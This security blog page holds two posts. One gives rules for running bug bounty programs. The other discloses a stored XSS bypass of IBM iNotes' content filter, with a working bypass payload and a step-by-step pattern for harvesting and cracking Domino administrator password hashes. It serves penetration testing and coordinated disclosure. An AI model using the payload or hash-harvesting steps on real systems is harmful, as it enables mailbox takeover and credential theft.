Wednesday, August 21, 2013

Five Golden Rules For A Successful Bug Bounty Program

Bug bounty programs have become a popular complement to already existing security practices, like secure software development and security testing. In this space, there are successful examples with many bugs reported and copious rewards paid out. For vendors, users and researchers, this seems to be a mutually beneficial ecosystem.

True is that not all bug bounty initiatives have been so successful. In some cases, a great idea was poorly executed resulting in frustration and headache for both vendors and researchers.  Ineffective programs are mainly caused by security immaturity, as not all companies are ready and motivated enough to organize and maintain such initiatives.  Bug bounties are a great complement to other practices but cannot completely substitute professional penetration tests and source code analysis. Many organizations fail to understand that and jump on the bounties bandwagon without having mature security practices in place.

Talking with a bunch of friends during BlackHat/Defcon, we came up with a list of five golden rules to set your bug bounty program up for success. Although the list is not exhaustive, it was built by collecting opinions from numerous peers and should be a good representation of what security researchers expect.

If you are a vendor considering to start a similar initiative, please read it carefully.

The Five Golden Rules:

1. Build trust, with facts
Security testing is based on trust, between client and provider. Trust is important during testing, and especially crucial during disclosure time. As a vendor, make sure to provide as much clarity as you can. For duplicate bugs, increase your transparency by providing more details to the reporter (e.g. date/time of the initial disclosure, original bug ID, etc.). Also, fixing bugs and claiming that they are not relevant (thus non-eligible to rewards) is a perfect way to lose trust.

2. Fast turn around
Security researchers are happy to spend extra time on explaining bugs and providing workarounds, however they also expect to get notified (and rewarded) at the same reasonable speed. From reporting the bug to paying out rewards, you should have a fast turn around. Fast means days - not months. Even if you need more time to fix the bug, pay out immediately the reward and explain in detail the complexity of rolling out the patch. Decoupling internal development life cycles and bounties allows you to be flexible with external reporters while maintaining your standard company processes.

3. Get security experts
If you expect web security bugs, make sure to have web security experts around you. For memory corruption vulnerabilities, you need people able to understand root causes and to investigate application crashes. Either internally or through leveraging trusted parties, this aspect is crucial for your reputation. Many of us have experienced situations in which we had to explain basic vulnerabilities and how to replicate those issues. In several cases, the interlocutors were software engineers and not security folks: we simply talk different languages and use different tools.

4. Adequate rewards
Make sure that your monetary rewards are aligned with the market. What's adequate? Check Mozilla, Facebook, Google, Etsy and many others. If you don't have enough budget - just setup a wall of fame, send nice swags and be creative. For instance, you could decide to pay for specific classes of bugs or medium-high impact vulnerabilities only. Always paying at the low end of your rewards range, even for critical security bugs, it is just pathetic. Before starting, crunch some numbers by reviewing past penetration test reports performed by recognized consulting boutiques.

5. Non-eligible bugs
Clarify the scope of the program by providing concrete examples, eligible domains and types of bugs that are commonly rejected. Even so, you will have to reject submissions for a multitude of reasons: be as clear and transparent as possible. Spend a few minutes to explain the reason of rejection, especially when the researcher has over-estimated severity or not properly evaluated the issue.

Happy Bug Hunting, Happy Bug Squashing!

Friday, August 9, 2013

All your (iNotes) emails are belong to me

This post describes a critical bypass of the Active Content Filtering (ACF) mechanism that is implemented in IBM iNotes to avoid the inclusion of malicious HTML tags as part of emails. The bug has been identified during a web application penetration test, and can be exploited to perform stored Cross-Site Scripting (XSS) attacks. The bypass has been successfully verified with IBM iNotes 9 and an official bulletin and fix have been released on August 1st, 2013.

From zero to Domino admin in a matter of hours


Early this spring I have been asked to assess the security of the mail infrastructure owned by a big company here in Italy. Pentesting the Domino/Notes/iNotes ecosystem is nowadays a piece of cake because of the large amount of publicly available documentation, advisories and tools.

If you are interested in testing this kind of infrastructure, I would recommend the following resources.

First of all, Marco Ivaldi's script can be used to automatically download all users' password hashes, together with details about every single account (e.g. name, surname, e-mail address, etc.). By simply accessing the names.nsf web resource, the tool extracts the desired information disclosed by the hidden attribute named HTTPPassword. The extracted hashes can be easily cracked using John The Ripper: William Ghote gave a great talk at BSides Las Vegas 2012 detailing the Lotus Notes password cracking process.

Finally, Penetration from application down to OS - Lotus Domino by Alexandr Polyakov and Lotus Domino: Penetration Through the Controller by Alexey Sintsov complete the picture providing even more details on how to pentest Lotus Domino deployments.

The links above are amazing resources that describe step by step how to easily hack into a mail infrastructure based on IBM solutions. As for my experience, a standard attack pattern to breach the Domino/iNotes infrastructure and access every company's e-mail accounts can be schematized as follow:

  1. Identify the location/path of the names.nsf web resource;
  2. Identify the user(s) with administrative privileges;
  3. Verify the user's password hash disclosure via the HTTPPassword hidden attribute;
  4. Get all the administrators' password hashes;
  5. Crack the so obtained hashes with John the Ripper;
  6. Log into the Domino Web Administrator application and have a drink.

The whole process took less than 30 hours and I can't hide that, at least for this time, this task was as easy as cut and paste of known attacks against an outdated environment. As my pentest objectives were quickly accomplished, I decided to turn my job into a security research session. Because of that, I dedicated the rest of the engagement to verifying the effectiveness of the aforementioned ACF mechanism.

Active Content Filtering (ACF) vulnerability details


The analysis of the filter started with injecting simple and well-known XSS attack vectors, in order to understand the underlying logic and spot potential defects. On the basis of my analysis - that must be considered an incomplete understanding of the filter's internals, based exclusively on black box observations - ACF tries to block malicious HTML tags by both commenting JavaScript code, specified by the <script> tag, and normalizing/filtering tag attributes that could lead to client-side code execution (e.g. by eliminating the onXYZ event handlers, such as onerror or onmouseover). During the engagement, I found that the filtering feature is not properly implemented and allows an attacker to inject arbitrary attributes. In details, what I found is that the ACF is not able to correctly sanitize the sequence of characters src="<. For the sake of clarity, the following attack payload:

<img src="< onerror=alert(1) src=x>

would be transformed in:

<img < onerror=alert(1) src=x>

resulting in the JavaScript alert method execution. Figure 1 shows how the above vector is incorrectly treated and used to set the BodyHtml variable - which contains the mail's HTML body message.

Figure 1 - Bypass of the ACF mechanism and injection of JavaScript code.

Conclusion


The ACF bypass can be effectively abused to perform stored XSS attacks against iNotes users. In a real-world attack scenario, the bug could not only be exploited to perform Session Hijacking but also combined with Cross-Site Request Forgery (CSRF) to add a new e-mails forwarding rule to the victim's iNotes application, thus effectively backdooring the victim's mailbox. 

The following video demonstrates the execution of arbitrary JavaScript thanks to the described vulnerability. Moreover, it shows how the mail preview mechanism, if enabled, implies that the victim is not required to open the message in order to trigger the execution of JavaScript code - greatly reducing the required user iteration: 





Finally, I would like to thank my fellow Sandro Zaccarini and Leonardo Rizzi for providing me the infrastructure to properly investigate this issue, and IBM Product Security Incident Response Team (PSIRT) for their timely responses and professionalism.